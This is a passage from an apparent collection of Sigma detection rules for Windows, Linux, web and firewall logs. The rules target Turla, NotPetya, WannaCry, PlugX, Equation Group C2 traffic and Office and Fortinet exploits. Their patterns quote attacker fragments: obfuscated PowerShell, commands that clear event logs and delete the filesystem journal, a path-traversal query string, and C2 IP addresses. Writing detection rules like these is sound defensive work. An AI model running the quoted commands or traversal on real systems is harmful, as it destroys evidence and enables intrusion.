    "content": "title: Turla Group Commands May 2020\nid: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c\nstatus: test\ndescription: Detects commands used by Turla group as reported by ESET in May 2020\nreferences:\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-26\nmodified: 2025-10-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.g0010\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1053.005\n    - attack.t1027\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains:\n            - 'tracert -h 10 yahoo.com'\n            - '.WSqmCons))|iex;'\n            - 'Fr`omBa`se6`4Str`ing'\n    selection_cli_2:\n        CommandLine|re: 'net\\s+use\\s+https://docs.live.net'\n        CommandLine|contains: '@aol.co.uk'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml",
    "content": "title: Exploit for CVE-2015-1641\nid: 7993792c-5ce2-4475-a3db-a3a5539827ef\nstatus: stable\ndescription: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641\nreferences:\n    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/\n    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-22\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - cve.2015-1641\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|endswith: '\\MicroScMgmt.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml",
    "content": "title: Exploit for CVE-2017-0261\nid: 864403a1-36c9-40a2-a982-4c9a45f7d833\nstatus: test\ndescription: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-22\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-0261\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|contains: '\\FLTLDR.exe'\n    condition: selection\nfalsepositives:\n    - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml",
    "content": "title: Droppers Exploiting CVE-2017-11882\nid: 678eb5f4-8597-4be6-8be7-905e4234b53a\nstatus: stable\ndescription: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe\nreferences:\n    - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100\n    - https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-\n    - https://github.com/embedi/CVE-2017-11882\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-23\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-11882\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\EQNEDT32.EXE'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml",
    "content": "title: Exploit for CVE-2017-8759\nid: fdd84c68-a1f6-47c9-9477-920584f94905\nstatus: test\ndescription: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759\nreferences:\n    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\n    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-09-15\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\n    - attack.initial-access\n    - attack.t1566.001\n    - cve.2017-8759\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\WINWORD.EXE'\n        Image|endswith: '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml",
    "content": "title: Adwind RAT / JRAT\nid: 1fac1481-2dbc-48b2-9096-753c49b4ec71\nstatus: test\ndescription: Detects javaw.exe in AppData folder as used by Adwind / JRAT\nreferences:\n    - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100\n    - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community\ndate: 2017-11-10\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains|all:\n              - '\\AppData\\Roaming\\Oracle'\n              - '\\java'\n              - '.exe '\n        - CommandLine|contains|all:\n              - 'cscript.exe'\n              - 'Retrive'\n              - '.vbs '\n    condition: selection\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/CosmicDuke/win_security_mal_cosmik_duke_persistence.yml",
    "content": "title: CosmicDuke Service Installation\nid: cb062102-587e-4414-8efa-dbe3c7bf19c6\nrelated:\n    - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a\n      type: derived\nstatus: test\ndescription: |\n    Detects the installation of a service named \"javamtsup\" on the system.\n    The CosmicDuke info stealer uses Windows services typically named \"javamtsup\" for persistence.\nreferences:\n    - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\nauthor: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)\ndate: 2017-03-27\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1543.003\n    - attack.t1569.002\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName: 'javamtsup'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml",
    "content": "title: Fireball Archer Install\nid: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d\nstatus: test\ndescription: Detects Archer malware invocation via rundll32\nreferences:\n    - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/\n    - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-03\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'rundll32.exe'\n            - 'InstallArcherSvc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml",
    "content": "title: Malware Shellcode in Verclsid Target Process\nid: b7967e22-3d7e-409b-9ed5-cdae3f9243a1\nstatus: test\ndescription: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro\nreferences:\n    - https://twitter.com/JohnLaTwC/status/837743453039534080\nauthor: John Lambert (tech), Florian Roth (Nextron Systems)\ndate: 2017-03-04\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_access\n    product: windows\n    definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: <ProcessAccess onmatch=\"include\"><CallTrace condition=\"contains\">VBE7.DLL</CallTrace></ProcessAccess><ProcessAccess onmatch=\"exclude\"><CallTrace condition=\"excludes\">UNKNOWN</CallTrace></ProcessAccess>'\ndetection:\n    selection_target:\n        TargetImage|endswith: '\\verclsid.exe'\n        GrantedAccess: '0x1FFFFF'\n    selection_calltrace_1:\n        CallTrace|contains|all:\n            - '|UNKNOWN('\n            - 'VBE7.DLL'\n    selection_calltrace_2:\n        SourceImage|contains: '\\Microsoft Office\\'\n        CallTrace|contains: '|UNKNOWN'\n    condition: selection_target and 1 of selection_calltrace_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml",
    "content": "title: NotPetya Ransomware Activity\nid: 79aeeb41-8156-4fac-a0cd-076495ab82a1\nstatus: test\ndescription: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil\nreferences:\n    - https://securelist.com/schroedingers-petya/78870/\n    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tom Ueltschi\ndate: 2019-01-16\nmodified: 2022-12-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.t1070.001\n    - attack.credential-access\n    - attack.t1003.001\n    - car.2016-04-002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_specific_pattern:\n        CommandLine|contains:\n            - 'wevtutil cl Application & fsutil usn deletejournal /D C:'\n            - 'dllhost.dat %WINDIR%\\ransoms'\n    selection_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith:\n            - '.dat,#1'\n            - '.dat #1' # Sysmon removes comma\n            - '.zip.dll\",#1'\n    selection_perfc_keyword:\n        - '\\perfc.dat'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml",
    "content": "title: Potential PlugX Activity\nid: aeab5ec5-be14-471a-80e8-e344418305c2\nstatus: test\ndescription: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location\nreferences:\n    - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n    - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-12\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.s0013\n    - attack.defense-evasion\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cammute:\n        Image|endswith: '\\CamMute.exe'\n    filter_cammute:\n        Image|contains:\n            - '\\Lenovo\\Communication Utility\\'\n            - '\\Lenovo\\Communications Utility\\'\n    selection_chrome_frame:\n        Image|endswith: '\\chrome_frame_helper.exe'\n    filter_chrome_frame:\n        Image|contains: '\\Google\\Chrome\\application\\'\n    selection_devemu:\n        Image|endswith: '\\dvcemumanager.exe'\n    filter_devemu:\n        Image|contains: '\\Microsoft Device Emulator\\'\n    selection_gadget:\n        Image|endswith: '\\Gadget.exe'\n    filter_gadget:\n        Image|contains: '\\Windows Media Player\\'\n    selection_hcc:\n        Image|endswith: '\\hcc.exe'\n    filter_hcc:\n        Image|contains: '\\HTML Help Workshop\\'\n    selection_hkcmd:\n        Image|endswith: '\\hkcmd.exe'\n    filter_hkcmd:\n        Image|contains:\n            - '\\System32\\'\n            - '\\SysNative\\'\n            - '\\SysWow64\\'\n    selection_mc:\n        Image|endswith: '\\Mc.exe'\n    filter_mc:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n    selection_msmpeng:\n        Image|endswith: '\\MsMpEng.exe'\n    filter_msmpeng:\n        Image|contains:\n            - '\\Microsoft Security Client\\'\n            - '\\Windows Defender\\'\n            - '\\AntiMalware\\'\n    selection_msseces:\n        Image|endswith: '\\msseces.exe'\n    filter_msseces:\n        Image|contains:\n            - '\\Microsoft Security Center\\'\n            - '\\Microsoft Security Client\\'\n            - '\\Microsoft Security Essentials\\'\n    selection_oinfo:\n        Image|endswith: '\\OInfoP11.exe'\n    filter_oinfo:\n        Image|contains: '\\Common Files\\Microsoft Shared\\'\n    selection_oleview:\n        Image|endswith: '\\OleView.exe'\n    filter_oleview:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n            - '\\Windows Resource Kit\\'\n    selection_rc:\n        Image|endswith: '\\rc.exe'\n    filter_rc:\n        Image|contains:\n            - '\\Microsoft Visual Studio'\n            - '\\Microsoft SDK'\n            - '\\Windows Kit'\n            - '\\Windows Resource Kit\\'\n            - '\\Microsoft.NET\\'\n    condition: ( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml",
    "content": "title: StoneDrill Service Install\nid: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6\nstatus: test\ndescription: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky\nreferences:\n    - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-07\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0064\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: NtsSrv\n        ImagePath|endswith: ' LocalService'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml",
    "content": "title: WannaCry Ransomware Activity\nid: 41d40bff-377a-43e2-8e1b-2e543069e079\nstatus: test\ndescription: Detects WannaCry ransomware activity\nreferences:\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\n    - https://x.com/nas_bench/status/1868639048484425963\nauthor: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro\ndate: 2019-01-16\nmodified: 2025-10-18\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - attack.discovery\n    - attack.t1083\n    - attack.defense-evasion\n    - attack.t1222.001\n    - attack.impact\n    - attack.t1486\n    - attack.t1490\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\tasksche.exe'\n              - '\\mssecsvc.exe'\n              - '\\taskdl.exe'\n              - '\\taskhsvc.exe'\n              - '\\taskse.exe'\n              - '\\111.exe'\n              - '\\lhdfrgui.exe'\n              # - '\\diskpart.exe'  # cannot be used in a rule of level critical\n              - '\\linuxnew.exe'\n              - '\\wannacry.exe'\n        - Image|contains: 'WanaDecryptor'\n    selection_cmd:\n        CommandLine|contains: '@Please_Read_Me@.txt'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml",
    "content": "title: Potential APT10 Cloud Hopper Activity\nid: 966e4016-627f-44f7-8341-f394905c361f\nstatus: test\ndescription: Detects potential process and execution activity related to APT10 Cloud Hopper operation\nreferences:\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-07\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.g0045\n    - attack.t1059.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cscript:\n        Image|endswith: '\\cscript.exe'\n        CommandLine|contains: '.vbs /shell '\n    selection_csvde:\n        CommandLine|contains|all:\n            - 'csvde -f C:\\windows\\web\\'\n            - '.log'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml",
    "content": "title: Ps.exe Renamed SysInternals Tool\nid: 18da1007-3f26-470f-875d-f77faf1cab31\nstatus: test\ndescription: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report\nreferences:\n    - https://www.us-cert.gov/ncas/alerts/TA17-293A\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-10-22\nmodified: 2023-05-02\ntags:\n    - attack.defense-evasion\n    - attack.g0035\n    - attack.t1036.003\n    - car.2013-05-009\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ps.exe -accepteula'\n            - '-s cmd /c netstat'\n    condition: selection\nfalsepositives:\n    - Renamed SysInternals tool\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Equation-Group/net_firewall_apt_equationgroup_c2.yml",
    "content": "title: Equation Group C2 Communication\nid: 881834a4-6659-4773-821e-1c151789d873\nstatus: test\ndescription: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools\nreferences:\n    - https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation\n    - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-15\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.g0020\n    - attack.t1041\n    - detection.emerging-threats\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        - dst_ip:\n              - '69.42.98.86'\n              - '89.185.234.145'\n        - src_ip:\n              - '69.42.98.86'\n              - '89.185.234.145'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml",
    "content": "title: Lazarus System Binary Masquerading\nid: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b\nstatus: test\ndescription: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location\nreferences:\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf\nauthor: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)\ndate: 2020-06-03\nmodified: 2023-03-10\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\msdtc.exe'\n            - '\\gpsvc.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Pandemic/registry_event_apt_pandemic.yml",
    "content": "title: Pandemic Registry Key\nid: 47e0852a-cf81-4494-a8e6-31864f8c86ed\nstatus: test\ndescription: Detects Pandemic Windows Implant\nreferences:\n    - https://wikileaks.org/vault7/#Pandemic\n    - https://twitter.com/MalwareJake/status/870349480356454401\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-01\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.emerging-threats\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\services\\null\\Instance'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml",
    "content": "title: Turla Group Named Pipes\nid: 739915e4-1e70-4778-8b8a-17db02f66db1\nstatus: test\ndescription: Detects a named pipe used by Turla group samples\nreferences:\n    - Internal Research\nauthor: Markus Neis\ndate: 2017-11-06\nmodified: 2021-11-27\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1106\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName:\n            - '\\atctl'    # https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection\n            - '\\comnap'   # https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n            - '\\iehelper' # ruag apt case\n            - '\\sdlrpc'   # project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n            - '\\userpipe' # ruag apt case\n            # - '\\rpc' # may cause too many false positives : http://kb.palisade.com/index.php?pg=kb.page&id=483\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/win_system_apt_carbonpaper_turla.yml",
    "content": "title: Turla Service Install\nid: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4\nstatus: test\ndescription: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET\nreferences:\n    - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-31\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0010\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'srservice'\n            - 'ipvpn'\n            - 'hkmsvc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2017/TA/Turla/win_system_apt_turla_service_png.yml",
    "content": "title: Turla PNG Dropper Service\nid: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1\nstatus: test\ndescription: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018\nreferences:\n    - https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-11-23\nmodified: 2021-11-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.g0010\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'WerFaultSvc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-13379/web_cve_2018_13379_fortinet_preauth_read_exploit.yml",
    "content": "title: Fortinet CVE-2018-13379 Exploitation\nid: a2e97350-4285-43f2-a63f-d0daff291738\nstatus: test\ndescription: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs\nreferences:\n    - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/\nauthor: Bhabesh Raj\ndate: 2020-12-08\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2018-13379\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - 'lang=/../../'\n            - '/dev/cmdb/sslvpn_websession'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-15473/lnx_sshd_exploit_cve_2018_15473.yml",
    "content": "title: SSHD Error Message CVE-2018-15473\nid: 4c9d903d-4939-4094-ade0-3cb748f4d7da\nstatus: test\ndescription: Detects exploitation attempt using public exploit code for CVE-2018-15473\nreferences:\n    - https://github.com/Rhynorater/CVE-2018-15473-Exploit\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-24\nmodified: 2021-11-27\ntags:\n    - attack.reconnaissance\n    - attack.t1589\n    - cve.2018-15473\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2018/Exploits/CVE-2018-2894/web_cve_2018_2894_weblogic_exploit.yml",
    "content": "title: Oracle WebLogic Exploit\nid: 37e8369b-43bb-4bf8-83b6-6dd43bda2000\nstatus: test\ndescription: Detects access to a webshell dropped into a keystore folder on the WebLogic server\nreferences:\n    - https://twitter.com/pyn3rd/status/1020620932967223296\n    - https://github.com/LandGrey/CVE-2018-2894\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-07-22\nmodified: 2023-01-02\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2018-2894\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query: '*/config/keystore/*.js*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml",
    "content": "title: Elise Backdoor Activity\nid: e507feb7-5f73-4ef6-a970-91bb6f6d744f\nstatus: test\ndescription: Detects Elise backdoor activity used by APT32\nreferences:\n    - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting\n    - https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-01-31\nmodified: 2023-03-09\ntags:\n    - attack.g0030\n    - attack.g0050\n    - attack.s0081\n    - attack.execution\n    - attack.t1059.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other_svchost:\n        Image|endswith: '\\Microsoft\\Network\\svchost.exe'\n    selection_other_del:\n        CommandLine|contains|all:\n            - '\\Windows\\Caches\\NavShExt.dll'\n            - '/c del'\n    selection_dll_path:\n        CommandLine|endswith:\n            - '\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll'\n            - '\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll'\n    selection_dll_function:\n        CommandLine|contains: ',Setting'\n    condition: 1 of selection_other_* or all of selection_dll_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml",
